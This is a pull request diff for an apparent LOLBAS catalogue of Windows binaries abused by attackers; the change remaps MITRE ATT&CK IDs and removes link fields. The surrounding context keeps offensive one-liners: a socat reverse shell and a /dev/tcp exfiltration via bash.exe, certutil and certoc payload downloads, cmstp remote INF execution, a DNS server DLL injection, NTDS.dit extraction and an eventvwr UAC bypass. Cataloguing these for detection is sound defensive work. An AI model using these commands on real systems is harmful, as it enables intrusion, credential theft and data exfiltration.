### PR TITLE
MITRE ATT&CK realignment sprint

### DIFF
--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/RunCmd_X64.yml
@@ -10,13 +10,12 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
 - Path: C:\OEM\Preload\utility
-Code_Sample: 
-- Code: 
-Detection: 
+Code_Sample:
+- Code:
+Detection:
 - IOC: RunCmd_X64.exe spawned
 Resources:
  - Link: https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html

--- a/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherBinaries/Upload.yml
@@ -10,10 +10,9 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 7 and up with Whatsapp installed
 Full_Path:
   - Path: '%localappdata%\Whatsapp\Update.exe'
-Detection: 
+Detection:
   - IOC: '"%localappdata%\Whatsapp\Update.exe" spawned an unknown process'
 ---

--- a/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherMSBinaries/Winword.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows
 Full_Path:
   - Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

--- a/Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml
+++ b/Archive-Old-Version/LOLUtilz/OtherScripts/Testxlst.yml
@@ -9,14 +9,12 @@ Commands:
     Category: Execution
     Privileges: User
     MitreID: T1064
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
     OperatingSystem: Windows
   - Command: wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
     Description: Test Jscript included in Python tool to perform XSL transform (for payload execution).
     Category: Execution
     Privileges: User
     MitreID: T1064
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1064
     OperatingSystem: Windows
 Full_Path:
   - c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)

--- a/YML-Template.yml
+++ b/YML-Template.yml
@@ -1,8 +1,8 @@
 ---
 Name: Binary.exe
 Description: Something general about the binary
-Author: The person that created this file
-Created: Date the person created this file
+Author: The name of the person that created this file
+Created: YYYY-MM-DD (date the person created this file)
 Commands:
   - Command: The command
     Description: Description of the command
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Required privs
     MitreID: T1055
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1055
     OperatingSystem: Windows 10 1803, Windows 10 1703
   - Command: The second command
     Description: Description of the second command
@@ -18,14 +17,13 @@ Commands:
     Category: AWL Bypass
     Privileges: Required privs
     MitreID: T1033
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1033
     OperatingSystem: Windows 10 All
 Full_Path:
   - Path: c:\windows\system32\bin.exe
   - Path: c:\windows\syswow64\bin.exe
-Code_Sample: 
+Code_Sample:
   - Code: http://url.com/git.txt
-Detection: 
+Detection:
   - IOC: Event ID 10
   - IOC: binary.exe spawned
 Resources:

--- a/yml/OSBinaries/AppInstaller.yml
+++ b/yml/OSBinaries/AppInstaller.yml
@@ -5,12 +5,11 @@ Author: 'Wade Hickey'
 Created: '2020-12-02'
 Commands:
   - Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
-    Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY> 
+    Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
     Usecase: Download file from Internet
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe

--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
@@ -1,6 +1,6 @@
 ---
 Name: Aspnet_Compiler.exe
-Description: ASP.NET Compilation Tool 
+Description: ASP.NET Compilation Tool
 Author: Jimmy (@bohops)
 Created: 2021-09-26
 Commands:
@@ -10,14 +10,13 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
   - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
-Code_Sample: 
+Code_Sample:
   - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder
-Detection: 
+Detection:
   - IOC: Sysmon Event ID 1 - Process Creation
 Resources:
   - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/

--- a/yml/OSBinaries/Aspnet_Compiler.yml
+++ b/yml/OSBinaries/Aspnet_Compiler.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1218
+    MitreID: T1127
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
     Category: Execute
     Privileges: Local Admin
-    MitreID: T1053
+    MitreID: T1053.002
     OperatingSystem: Windows 7 or older
 Full_Path:
   - Path: C:\WINDOWS\System32\At.exe

--- a/yml/OSBinaries/At.yml
+++ b/yml/OSBinaries/At.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: Local Admin
     MitreID: T1053
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1053
     OperatingSystem: Windows 7 or older
 Full_Path:
   - Path: C:\WINDOWS\System32\At.exe

--- a/yml/OSBinaries/Atbroker.yml
+++ b/yml/OSBinaries/Atbroker.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Atbroker.exe

--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@@ -9,28 +9,28 @@ Commands:
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows 10
   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
     Description: Executes a reverseshell
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows 10
   - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
     Description: Exfiltrate data
     Usecase: Performs execution of specified file, can be used as a defensive evasion.
     Category: Execute
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows 10
   - Command: bash.exe -c calc.exe
     Description: Executes calc.exe from bash.exe
     Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
     Category: AWL Bypass
     Privileges: User
-    MitreID: T1218
+    MitreID: T1202
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\bash.exe

--- a/yml/OSBinaries/Bash.yml
+++ b/yml/OSBinaries/Bash.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
   - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
     Description: Executes a reverseshell
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
   - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
     Description: Exfiltrate data
@@ -26,7 +24,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
   - Command: bash.exe -c calc.exe
     Description: Executes calc.exe from bash.exe
@@ -34,7 +31,6 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\bash.exe

--- a/yml/OSBinaries/Bitsadmin.yml
+++ b/yml/OSBinaries/Bitsadmin.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
     Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
@@ -18,7 +17,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
     Description: Command for copying cmd.exe to another folder
@@ -26,7 +24,6 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
     Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
@@ -34,7 +31,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\bitsadmin.exe

--- a/yml/OSBinaries/Certoc.yml
+++ b/yml/OSBinaries/Certoc.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/techniques/T1218/
     OperatingSystem: Windows Server 2022
   - Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
     Description: Downloads text formatted files
@@ -18,14 +17,13 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/techniques/T1105/
-    OperatingSystem: Windows Server 2022  
+    OperatingSystem: Windows Server 2022
 Full_Path:
   - Path: c:\windows\system32\certoc.exe
   - Path: c:\windows\syswow64\certoc.exe
-Code_Sample: 
+Code_Sample:
   - Code:
-Detection: 
+Detection:
   - IOC: Process creation with given parameter
   - IOC: Unsigned DLL load via certoc.exe
   - IOC: Network connection via certoc.exe

--- a/yml/OSBinaries/Certreq.yml
+++ b/yml/OSBinaries/Certreq.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
     Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
@@ -18,7 +17,6 @@ Commands:
     Category: Upload
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\certreq.exe

--- a/yml/OSBinaries/Certutil.yml
+++ b/yml/OSBinaries/Certutil.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
     Description: Download and save 7zip to disk in the current folder.
@@ -18,15 +17,13 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
     Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
     Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/techniques/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil -encode inputFileName encodedOutputFileName
     Description: Command to encode a file using Base64
@@ -34,7 +31,6 @@ Commands:
     Category: Encode
     Privileges: User
     MitreID: T1027
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1027
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil -decode encodedInputFileName decodedOutputFileName
     Description: Command to decode a Base64 encoded file.
@@ -42,7 +38,6 @@ Commands:
     Category: Decode
     Privileges: User
     MitreID: T1140
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1140
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: certutil --decodehex encoded_hexadecimal_InputFileName
     Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
@@ -50,7 +45,6 @@ Commands:
     Category: Decode
     Privileges: User
     MitreID: T1140
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1140
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\certutil.exe

--- a/yml/OSBinaries/Cmd.yml
+++ b/yml/OSBinaries/Cmd.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1059.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmd.exe - < fakefile.doc:payload.bat
     Description: Execute payload.bat stored in an Alternate Data Stream (ADS).
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1170
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
+    MitreID: T1059.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmd.exe

--- a/yml/OSBinaries/Cmdkey.yml
+++ b/yml/OSBinaries/Cmdkey.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Credentials
     Privileges: User
     MitreID: T1078
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1078
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmdkey.exe

--- a/yml/OSBinaries/Cmdl32.yml
+++ b/yml/OSBinaries/Cmdl32.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmdl32.exe

--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@@ -9,16 +9,14 @@ Commands:
     Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
     Category: Execute
     Privileges: User
-    MitreID: T1191
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1191
+    MitreID: T1218.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
     Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
     Category: AwL bypass
     Privileges: User
-    MitreID: T1191
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1191
+    MitreID: T1218.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cmstp.exe

--- a/yml/OSBinaries/ConfigSecurityPolicy.yml
+++ b/yml/OSBinaries/ConfigSecurityPolicy.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Upload
     Privileges: User
     MitreID: T1567
-    MitreLink: https://attack.mitre.org/techniques/T1567/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

--- a/yml/OSBinaries/Control.yml
+++ b/yml/OSBinaries/Control.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1196
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1196
+    MitreID: T1218.002
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\control.exe

--- a/yml/OSBinaries/Csc.yml
+++ b/yml/OSBinaries/Csc.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: csc -target:library File.cs
     Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file.
@@ -18,7 +17,6 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe

--- a/yml/OSBinaries/Cscript.yml
+++ b/yml/OSBinaries/Cscript.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\cscript.exe

--- a/yml/OSBinaries/DataSvcUtil.yml
+++ b/yml/OSBinaries/DataSvcUtil.yml
@@ -10,13 +10,12 @@ Commands:
     Category: Upload
     Privileges: User
     MitreID: T1567
-    MitreLink: https://attack.mitre.org/techniques/T1567/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe
-Code_Sample: 
+Code_Sample:
   - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6
-Detection: 
+Detection:
   - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory.
   - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
   - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.

--- a/yml/OSBinaries/Desktopimgdownldr.yml
+++ b/yml/OSBinaries/Desktopimgdownldr.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\desktopimgdownldr.exe

--- a/yml/OSBinaries/Dfsvc.yml
+++ b/yml/OSBinaries/Dfsvc.yml
@@ -10,7 +10,6 @@ Commands:
     Category: AWL bypass
     Privileges: User
     MitreID: T1127
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe

--- a/yml/OSBinaries/Diantz.yml
+++ b/yml/OSBinaries/Diantz.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Hide data compressed into an Alternate Data Stream.
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
   - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
     Description: Download and compress a remote file and store it in a cab file on local machine.
@@ -18,7 +17,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
 Full_Path:
   - Path: c:\windows\system32\diantz.exe

--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Dump
     Privileges: User
     MitreID: T1218
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows server
   - Command: diskshadow> exec calc.exe
     Description: Execute commands using diskshadow.exe to spawn child process
@@ -18,7 +17,6 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1003
     OperatingSystem: Windows server
 Full_Path:
   - Path: C:\Windows\System32\diskshadow.exe

--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@@ -9,7 +9,7 @@ Commands:
     Usecase: Use diskshadow to exfiltrate data from VSS such as NTDS.dit
     Category: Dump
     Privileges: User
-    MitreID: T1218
+    MitreID: T1003.003
     OperatingSystem: Windows server
   - Command: diskshadow> exec calc.exe
     Description: Execute commands using diskshadow.exe to spawn child process

--- a/yml/OSBinaries/Diskshadow.yml
+++ b/yml/OSBinaries/Diskshadow.yml
@@ -16,7 +16,7 @@ Commands:
     Usecase: Use diskshadow to bypass defensive counter measures
     Category: Execute
     Privileges: User
-    MitreID: T1003
+    MitreID: T1202
     OperatingSystem: Windows server
 Full_Path:
   - Path: C:\Windows\System32\diskshadow.exe

--- a/yml/OSBinaries/Dllhost.yml
+++ b/yml/OSBinaries/Dllhost.yml
@@ -10,12 +10,11 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1546.015
-    MitreLink: https://attack.mitre.org/techniques/T1546/015/
     OperatingSystem: Windows 10 (and likely previous versions)
 Full_Path:
   - Path: C:\Windows\System32\dllhost.exe
   - Path: C:\Windows\SysWOW64\dllhost.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC:

--- a/yml/OSBinaries/Dnscmd.yml
+++ b/yml/OSBinaries/Dnscmd.yml
@@ -6,11 +6,10 @@ Created: 2018-05-25
 Commands:
   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
     Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
-    Usecase: Remotly inject dll to dns server
+    Usecase: Remotely inject dll to dns server
     Category: Execute
     Privileges: DNS admin
-    MitreID: T1035
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1035
+    MitreID: T1543.003
     OperatingSystem: Windows server
 Full_Path:
   - Path: C:\Windows\System32\Dnscmd.exe

--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@@ -44,7 +44,7 @@ Commands:
     Usecase: Copy/extract a locked file such as the AD Database
     Category: Copy
     Privileges: Admin
-    MitreID: T1003
+    MitreID: T1003.003
     OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server
 Full_Path:
   - Path: C:\Windows\System32\esentutl.exe

--- a/yml/OSBinaries/Esentutl.yml
+++ b/yml/OSBinaries/Esentutl.yml
@@ -10,39 +10,34 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
     Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
     Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
     Usecase: Extract hidden file within alternate data streams
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
     Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
     Category: ADS
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
     Description: Copies the source EXE to the destination EXE file
     Usecase: Use to copy files from one unc path to another
     Category: Download
     Privileges: User
-    MitreID: T1096
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    MitreID: T1564.004
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
     Description: Copies a (locked) file using Volume Shadow Copy
@@ -50,7 +45,6 @@ Commands:
     Category: Copy
     Privileges: Admin
     MitreID: T1003
-    MitreLink: https://attack.mitre.org/techniques/T1003/
     OperatingSystem: Windows 10, Windows 2016 Server, Windows 2019 Server
 Full_Path:
   - Path: C:\Windows\System32\esentutl.exe

--- a/yml/OSBinaries/Eventvwr.yml
+++ b/yml/OSBinaries/Eventvwr.yml
@@ -9,8 +9,7 @@ Commands:
     Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
     Category: UAC bypass
     Privileges: User
-    MitreID: T1088
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1088
+    MitreID: T1548.002
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\eventvwr.exe

--- a/yml/OSBinaries/Expand.yml
+++ b/yml/OSBinaries/Expand.yml
@@ -10,7 +10,6 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat
     Description: Copies source file to destination.
@@ -18,15 +17,13 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
-    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
     Description: Copies source file to destination Alternate Data Stream (ADS)
     Usecase: Copies files from A to B
     Category: ADS
     Privileges: User
-    MitreID: T1096
